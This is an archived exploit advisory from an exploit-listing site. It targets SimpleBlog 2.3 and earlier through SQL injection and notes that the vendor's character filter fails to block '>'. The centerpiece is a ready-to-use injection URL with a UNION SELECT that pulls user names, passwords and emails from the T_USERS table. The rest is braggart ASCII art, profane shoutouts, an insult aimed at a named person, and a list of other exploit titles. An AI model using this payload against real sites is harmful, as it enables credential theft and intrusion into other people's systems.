exploits , vulnerabilities , articles , SimpleBlog <= 2.3 (id) Remote SQL Injection Vulnerability

2007-04-14 QDBlog 0.4 (SQL Injection/LFI) Multiple Remote Vulnerabilities
2007-04-09 MyBlog: PHP and MySQL Blog/CMS software RFI Vulnerability
2007-04-03 Xoops Module PopnupBlog <= 2.52 (postid) BLIND SQL Injection Exploit
2007-03-30 sBLOG 0.7.3 Beta (inc/lang.php) Local File Inclusion Exploit
2007-03-20 GeBlog 0.1 GLOBALS[tplname] Local File Inclusion Exploit (win)
2007-03-16 Particle Blogger <= 1.2.0 (post.php postid) Remote SQL Injection Exploit

2006-09-04

SimpleBlog <= 2.3 (id) Remote SQL Injection Vulnerability

Rated as : High Risk

                                           _           _        
                                    __   _(_)_ __  ___| |_ __ _ 
                                    \ \ / / | '_ \/ __| __/ _` |
                                     \ V /| | |_) \__ \ || (_| |
                                      \_/ |_| .__/|___/\__\__,_|
                                          |_| AnD
		                               _               _    _ _ _     
                       _ __ ___  _   _ _ __ __| | ___ _ __ ___| | _(_) |
|____
                      | '_ ` _ \| | | | '__/ _` |/ _ \ '__/ __| |/ / | |
|_  /
                      | | | | | | |_| | | | (_| |  __/ |  \__ \   <| |
| |/ / 
                      |_| |_| |_|\__,_|_|  \__,_|\___|_| 
|___/_|\_\_|_|_/___|

 		+-----------------------------------------------------------------+
		| Vipsta & MurderSkillz fucking pwnt this webApp                  |
		+-----------------------------------------------------------------+
		| App Name: SimpleBlog 2.3 					  |
		| App Author: 8pixel.net					  |
		| App Version: <= 2.3 						  |
		| App Type: Blog/Journal					  |
		+-----------------------------------------------------------------+
		| DETAILS							  |
		+-----------------------------------------------------------------+
		| Vulnerability: Remote SQL Injection				  |
		| Requirements: Database with UNION support			  |
		| Revisions: Note - This is a revision of another vuln 	          |
		|	            posted by Chironex Fleckeri			  |
		+-----------------------------------------------------------------+
		| CODE								  |
		+-----------------------------------------------------------------+
		| Vendor "implemented" a fix for SQL injection
vulnerabilities.   |
		| however this bullshit was easily worked around by		  |
		| Vipsta & MurderSkillz.					  |
		|								  |
		| Vendor attempted to remove illegal characters like ' and =      |
		| which stop most SQL injection vulnerabilities. However:	  |
		| Vendor failed to remove '>' symbol.				  |
		+-----------------------------------------------------------------+
		| EXPLOIT							  |
		+-----------------------------------------------------------------+
		| SQL Injection String:						  |

+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
 |
http://[target]/[path]/default.asp?view=plink&id=-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null,null%20FROM%20T_USERS%20WHERE%20id>1
 |

+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
 		| TIMELINE							  |
		+-----------------------------------------------------------------+
		| 9/2/06 - Vendor Notified.					  |
		| 9/2/06 - Vendor Replied. Threatens legal action.		  |
		| 9/4/06 - Exploit Released with no details to vendor.            |
		+-----------------------------------------------------------------+
		| SHOUTZ							  |
		+-----------------------------------------------------------------+
		| Everyone at g00ns.net - including:				  |
		| 	z3r0, spic, arya (aka nex, aka Lythex), FuRy, Mayo,	  |
		|	TrinTITTY, 0ptix, scuzz, overdose, Cre@mpuff, Riot,	  |
		|	JuNk, CeLe, LaD, NightSins, Zodiac, grumpy, FiSh, pr0be,  |
		|	ReysRaged, milf <3, gio, RedCoat, and all who I forgot!   |
		+-----------------------------------------------------------------+
		| ADDITIONAL NOTES						  |
		+-----------------------------------------------------------------+
		| TeamSpeak: ts.g00ns.net					  |
		| IRC: irc.g00ns.net						  |
		+-----------------------------------------------------------------+
		| PERSONAL STUFF						  |
		+-----------------------------------------------------------------+
		| Sess from g00ns.net IS A FUCKING MORON.                         |
		+-----------------------------------------------------------------+

                                             __ 
                                  ___  ___  / _|
                                 / _ \/ _ \| |_ 
                                |  __/ (_) |  _|
                                 \___|\___/|_|.
securitydot.net - 2006-09-04

Exploits - newest 10 RSS | More

2007-06-15 56729 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 33842 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 41959 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29068 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19531 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16514 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19175 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16372 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33318 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17034 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit